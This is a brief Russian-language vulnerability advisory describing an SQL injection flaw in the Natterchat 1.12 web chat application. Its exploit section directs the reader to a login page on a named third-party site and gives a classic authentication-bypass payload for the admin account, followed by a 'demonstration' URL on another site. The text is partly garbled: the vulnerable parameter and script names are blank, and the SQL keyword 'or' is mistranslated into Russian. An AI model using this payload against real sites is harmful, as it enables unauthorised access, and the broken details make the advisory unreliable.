Программа: Natterchat 1.12
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «» сценарием . Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.
Эксплоит:
1) Проследуйте по адресу http://www.site.il/chat/nattechat/home.asp
2) Username : admin
Password : ' или '1'='1
Демонстрация:
http://www.sprq.ca/cgi-bin/natterchat/chat.asp